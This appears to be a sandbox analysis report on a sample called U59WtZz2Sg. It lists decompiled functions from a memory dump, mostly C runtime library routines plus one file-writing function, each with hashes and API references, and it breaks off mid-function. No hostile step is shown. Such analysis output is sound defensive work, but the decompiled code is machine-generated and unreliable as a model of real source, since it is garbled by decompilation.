Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
Opcode Fuzzy Hash: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00422130 Relevance: 6.2, APIs: 4, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E00422130(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				_t124 = _t99;
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E0042B420(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(__eflags == 0) {
							goto L3;
						} else {
							__eflags = _t97 - (_t74 | 0xffffffff) / _a12;
							if(__eflags > 0) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E0042B2F2(_t98, _t119, _t119);
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(__eflags != 0) {
													E0042B420(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E00425208(__eflags))) = 0x22;
												L4:
												E004242D2();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_v8 = _t110 + 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E0042816B(_t119));
											_t88 = E0042B5C4();
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E00429544(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										_t120 = _t120 + 0x10;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E00425208(_t124))) = 0x16;
				goto L4;
			}

0x0042213a
0x0042213d
0x00422143
0x00422146
0x00422149
0x00422166
0x00000000
0x00422166
0x0042214b
0x00422150
0x00000000
0x00000000
0x00422152
0x00422154
0x0042216f
0x00422172
0x00422174
0x00422182
0x00422182
0x00422186
0x0042218e
0x00422193
0x00422193
0x00422196
0x00422198
0x00000000
0x0042219a
0x004221a2
0x004221a4
0x00000000
0x00000000
0x004221a6
0x004221a9
0x004221ac
0x004221b3
0x004221b5
0x004221bc
0x004221b7
0x004221b7
0x004221b7
0x004221c1
0x004221c4
0x004221c6
0x004222af
0x00000000
0x004221cc
0x004221cc
0x004221cc
0x004221d3
0x00422214
0x00422214
0x00422216
0x00422281
0x00422287
0x0042228a
0x004222e1
0x00000000
0x004222e7
0x0042228c
0x0042228f
0x00422291
0x004222b7
0x004222b7
0x004222bb
0x004222c5
0x004222ca
0x004222d2
0x00422161
0x00422161
0x00000000
0x00422161
0x00422293
0x00422296
0x00422299
0x0042229a
0x0042229d
0x0042229d
0x0042229e
0x004222a1
0x004222a4
0x00000000
0x004222a4
0x00422218
0x0042221a
0x0042223e
0x00422243
0x00422249
0x0042224b
0x0042224b
0x0042221c
0x0042221e
0x00422224
0x00422236
0x00422236
0x00422236
0x00422238
0x00422226
0x0042222b
0x0042222d
0x0042222d
0x0042223a
0x0042223a
0x0042224d
0x00422250
0x00000000
0x00422252
0x00422252
0x00422253
0x0042225d
0x0042225e
0x00422263
0x00422266
0x00422268
0x004222ef
0x00000000
0x004222ef
0x0042226e
0x00422271
0x004222dd
0x004222dd
0x004222dd
0x004222dd
0x00000000
0x004222dd
0x00422273
0x00422273
0x00422275
0x00422275
0x00422278
0x0042227b
0x00000000
0x0042227b
0x00422250
0x004221d5
0x004221d8
0x004221db
0x004221dd
0x00000000
0x00000000
0x004221df
0x00000000
0x00000000
0x004221e5
0x004221e7
0x004221e9
0x004221eb
0x004221eb
0x004221ee
0x004221f1
0x004221f3
0x00000000
0x004221f9
0x00422200
0x00422205
0x00422208
0x0042220b
0x0042220e
0x00422210
0x00000000
0x00422210
0x004222a7
0x004222a7
0x004222a7
0x00000000
0x004221cc
0x004221c6
0x00422198
0x0042217b
0x0042217e
0x00422180
0x00000000
0x00000000
0x00000000
0x00422180
0x00422156
0x0042215b
0x00000000

APIs

_memset.LIBCMT ref: 0042218E
__read_nolock.LIBCMT ref: 0042225E
__filbuf.LIBCMT ref: 00422281
_memset.LIBCMT ref: 004222C5

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock
String ID:
API String ID: 2974526305-0
Opcode ID: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
Opcode Fuzzy Hash: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0043C677 Relevance: 6.1, APIs: 4, Instructions: 97
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0043C677(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E0042019C( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E00422BCC( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E00425208(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

0x0043c67f
0x0043c684
0x0043c69e
0x00000000
0x0043c69e
0x0043c686
0x0043c68b
0x00000000
0x00000000
0x0043c690
0x0043c6ad
0x0043c6b2
0x0043c6b5
0x0043c6bc
0x0043c6db
0x0043c6e2
0x0043c6e4
0x0043c728
0x0043c737
0x0043c745
0x0043c747
0x0043c757
0x0043c757
0x0043c75b
0x0043c75d
0x0043c760
0x0043c760
0x0043c760
0x0043c760
0x00000000
0x0043c766
0x0043c749
0x0043c749
0x0043c74e
0x0043c74e
0x0043c751
0x00000000
0x0043c751
0x0043c6e6
0x0043c6e9
0x0043c6ed
0x0043c716
0x0043c716
0x0043c719
0x0043c719
0x00000000
0x00000000
0x0043c71b
0x0043c71f
0x00000000
0x00000000
0x0043c721
0x0043c721
0x00000000
0x0043c721
0x0043c6ef
0x0043c6f2
0x00000000
0x00000000
0x0043c6f6
0x0043c709
0x0043c70f
0x0043c712
0x0043c714
0x00000000
0x00000000
0x00000000
0x0043c714
0x0043c6be
0x0043c6c1
0x0043c6c3
0x0043c6c8
0x0043c6c8
0x0043c6cd
0x00000000
0x0043c6cd
0x0043c692
0x0043c697
0x0043c69b
0x0043c69b
0x00000000

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
__isleadbyte_l.LIBCMT ref: 0043C6DB
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040F0E0 Relevance: 6.1, APIs: 4, Instructions: 86
filestringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040F0E0(intOrPtr* __ecx, char _a4, intOrPtr _a24) {
				struct _OVERLAPPED* _v8;
				intOrPtr _v16;
				char _v17;
				long _v24;
				intOrPtr _v28;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t23;
				intOrPtr _t25;
				void* _t31;
				intOrPtr* _t35;
				signed int _t37;
				short* _t40;
				void* _t43;
				intOrPtr* _t46;
				CHAR* _t49;
				intOrPtr _t50;
				void* _t51;
				short* _t53;

				_push(0xffffffff);
				_push(0x4caa48);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t50;
				_t51 = _t50 - 0x20;
				_push(_t31);
				_t46 = __ecx;
				_v8 = 0;
				_t22 =  >=  ? _a4 :  &_a4;
				_t23 = CreateFileW( >=  ? _a4 :  &_a4, 0x40000000, 2, 0, 2, 0x80, 0);
				_t43 = _t23;
				if(_t43 == 0xffffffff) {
					L8:
					if(_a24 >= 8) {
						_t23 = L00422587(_a4);
					}
					 *[fs:0x0] = _v16;
					return _t23;
				}
				_t53 = _t51 - 0x18;
				_v17 = 0;
				_t40 = _t53;
				 *((intOrPtr*)(_t40 + 0x14)) = 7;
				 *(_t40 + 0x10) = 0;
				 *_t40 = 0;
				if( *_t46 != 0) {
					_t35 = _t46;
					_t31 = _t35 + 2;
					do {
						_t25 =  *_t35;
						_t35 = _t35 + 2;
					} while (_t25 != 0);
					_t37 = _t35 - _t31 >> 1;
					L6:
					_push(_t37);
					E00415C10(_t31, _t40, _t43, _t46, _t46);
					E00412840( &_v48, _v17);
					_t51 = _t53 + 0x18;
					_t49 =  >=  ? _v48 :  &_v48;
					WriteFile(_t43, _t49, lstrlenA(_t49),  &_v24, 0);
					_t23 = CloseHandle(_t43);
					if(_v28 >= 0x10) {
						_t23 = L00422587(_v48);
						_t51 = _t51 + 4;
					}
					goto L8;
				}
				_t37 = 0;
				goto L6;
			}

0x0040f0e3
0x0040f0e5
0x0040f0f0
0x0040f0f1
0x0040f0f8
0x0040f0fb
0x0040f0fe
0x0040f10b
0x0040f11b
0x0040f125
0x0040f12b
0x0040f130
0x0040f1bf
0x0040f1c3
0x0040f1c8
0x0040f1cd
0x0040f1d5
0x0040f1e0
0x0040f1e0
0x0040f136
0x0040f139
0x0040f13d
0x0040f141
0x0040f148
0x0040f14f
0x0040f155
0x0040f15b
0x0040f15d
0x0040f160
0x0040f160
0x0040f163
0x0040f166
0x0040f16d
0x0040f16f
0x0040f16f
0x0040f173
0x0040f17e
0x0040f183
0x0040f190
0x0040f1a1
0x0040f1a8
0x0040f1b2
0x0040f1b7
0x0040f1bc
0x0040f1bc
0x00000000
0x0040f1b2
0x0040f157
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
CloseHandle.KERNEL32(00000000), ref: 0040F1A8

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWritelstrlen
String ID:
API String ID: 1421093161-0
Opcode ID: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
Opcode Fuzzy Hash: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004C7094 Relevance: 6.0, APIs: 4, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 20%

			E004C7094(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __ebp;
				void* _t25;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				intOrPtr* _t31;
				void* _t33;

				_t30 = __esi;
				_t27 = __ebx;
				_t35 = _a28;
				_t29 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t29);
					_push(_a4);
					E004C77A0(__ebx, _t29, __esi, _t35);
					_t33 = _t33 + 0x10;
				}
				_t36 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t29);
				}
				E004C5B5C(_t28);
				_push(_t30);
				_t31 = _a32;
				_push( *_t31);
				_push(_a20);
				_push(_a16);
				_push(_t29);
				E004C7DDF(_t27, _t31, _t36);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t31 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t29);
				_push(_a4);
				_t25 = E004C6E8E(_t27, _t29, _t31, _t36);
				if(_t25 != 0) {
					E004C5B2A(_t25, _t29);
					return _t25;
				}
				return _t25;
			}

0x004c7094
0x004c7094
0x004c7097
0x004c709c
0x004c709f
0x004c70a1
0x004c70a4
0x004c70a7
0x004c70a8
0x004c70ab
0x004c70b0
0x004c70b0
0x004c70b3
0x004c70b7
0x004c70ba
0x004c70bf
0x004c70bc
0x004c70bc
0x004c70bc
0x004c70c2
0x004c70c7
0x004c70c8
0x004c70cb
0x004c70cd
0x004c70d0
0x004c70d3
0x004c70d4
0x004c70dd
0x004c70e2
0x004c70e5
0x004c70eb
0x004c70ee
0x004c70f1
0x004c70f4
0x004c70f5
0x004c70f8
0x004c7103
0x004c7107
0x00000000
0x004c7107
0x004c710e

APIs

___BuildCatchObject.LIBCMT ref: 004C70AB

Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9

_UnwindNestedFrames.LIBCMT ref: 004C70C2
___FrameUnwindToState.LIBCMT ref: 004C70D4
CallCatchBlock.LIBCMT ref: 004C70F8

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
String ID:
API String ID: 2901542994-0
Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 004409B9 Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004409B9(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00440F28(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00440A5D(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E004411DC(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E004410FD(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x004409bc
0x004409c2
0x00440a35
0x00000000
0x004409c9
0x004409c9
0x004409cc
0x004409e7
0x004409ea
0x00440a0a
0x00440a1c
0x004409ec
0x004409ec
0x004409ef
0x00000000
0x004409f1
0x00440a03
0x00440a03
0x004409ef
0x00440a3a
0x00440a3e
0x004409ce
0x004409e6
0x004409e6
0x004409cc

APIs

__cftof_l.LIBCMT ref: 004409DD

Part of subcall function 004410FD: __fltout2.LIBCMT ref: 00441126

__cftog_l.LIBCMT ref: 00440A03
__cftoe_l.LIBCMT ref: 00440A35

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85

Uniqueness

Uniqueness Score: -1.00%

Function 004127A0 Relevance: 6.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004127A0(WCHAR* __ecx, void* __edx) {
				int _v8;
				void* __ebx;
				void* __edi;
				short* _t12;
				void* _t17;
				char* _t18;
				int _t21;

				_t16 = __edx;
				_push(__ecx);
				_t12 = __ecx;
				_push(_t17);
				_t5 =  !=  ? 0xfde9 : 0;
				_v8 =  !=  ? 0xfde9 : 0;
				_t2 = lstrlenW(__ecx) + 1; // 0x1
				_t21 = _t2;
				_t18 = E00420C62(_t12, _t16, _t17, _t21);
				E0042B420(_t18, 0, _t21);
				WideCharToMultiByte(_v8, 0, _t12, 0xffffffff, _t18, _t21, 0, 0);
				return _t18;
			}

0x004127a0
0x004127a3
0x004127a7
0x004127b1
0x004127b2
0x004127b6
0x004127bf
0x004127bf
0x004127c9
0x004127ce
0x004127e4
0x004127f2

APIs

lstrlenW.KERNEL32 ref: 004127B9
_malloc.LIBCMT ref: 004127C3

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00820000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_memset.LIBCMT ref: 004127CE
WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
String ID:
API String ID: 2824100046-0
Opcode ID: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
Opcode Fuzzy Hash: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9

Uniqueness

Uniqueness Score: -1.00%

Function 00414920 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00414920(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a20) {
				intOrPtr _v8;
				signed int _v12;
				signed int _t128;
				intOrPtr _t134;
				intOrPtr* _t137;
				intOrPtr _t140;
				signed int _t144;
				intOrPtr* _t146;
				intOrPtr _t149;
				intOrPtr _t153;
				intOrPtr _t158;
				intOrPtr _t163;
				intOrPtr _t164;
				intOrPtr* _t165;
				intOrPtr _t167;
				intOrPtr _t171;
				intOrPtr _t191;
				signed int _t194;
				intOrPtr* _t195;
				intOrPtr _t196;
				intOrPtr* _t200;
				signed int _t203;
				intOrPtr _t204;
				intOrPtr* _t205;
				intOrPtr _t207;
				intOrPtr* _t208;
				intOrPtr* _t210;
				signed int _t212;
				intOrPtr* _t213;
				intOrPtr* _t217;
				intOrPtr* _t221;
				intOrPtr* _t223;
				intOrPtr* _t224;
				signed int _t226;
				intOrPtr* _t231;
				void* _t232;
				intOrPtr* _t235;
				intOrPtr* _t237;
				intOrPtr* _t240;
				intOrPtr* _t241;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				intOrPtr* _t251;
				void* _t258;
				void* _t259;

				_t200 = __ecx;
				_t259 = _t258 - 8;
				_t251 = __ecx;
				_t244 = _a4;
				_t128 =  *(__ecx + 0x10);
				if(_t128 < _t244) {
					L86:
					_push("invalid string position");
					E0044F26C(__eflags);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return  *((intOrPtr*)(_t200 + 0x10));
				} else {
					_t226 = _a16;
					_t200 =  *((intOrPtr*)(_a12 + 0x10));
					if(_t200 < _t226) {
						goto L86;
					} else {
						_v8 = _t128 - _t244;
						_t191 = _a8;
						_t192 =  <  ? _v8 : _t191;
						_v12 = _t200 - _t226;
						_a8 =  <  ? _v8 : _t191;
						_t200 =  <  ? _v12 : _a20;
						_t194 = _t128 - _a8;
						_v12 = _t194;
						_t195 = _a12;
						_a20 = _t200;
						if((_t128 | 0xffffffff) - _t200 <= _t194) {
							_push("string too long");
							E0044F23E(__eflags);
							goto L86;
						} else {
							_t134 = _a8;
							_t246 = _v12 + _t200;
							_v8 = _v8 - _t134;
							_v12 = _t246;
							_t247 = _a4;
							if( *(__ecx + 0x10) < _t246) {
								E00415D50(_t195, __ecx, _t247, __ecx, _v12, 0);
								_t200 = _a20;
								_t226 = _a16;
								_t134 = _a8;
							}
							if(_t251 == _t195) {
								_t196 = _a20;
								__eflags = _t196 - _t134;
								if(_t196 > _t134) {
									__eflags = _t226 - _t247;
									if(_t226 > _t247) {
										_t203 = _t247 + _t134;
										_a4 = _t203;
										__eflags = _t203 - _t226;
										if(_t203 > _t226) {
											_t204 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t204 - 8;
											if(_t204 < 8) {
												_a12 = _t251;
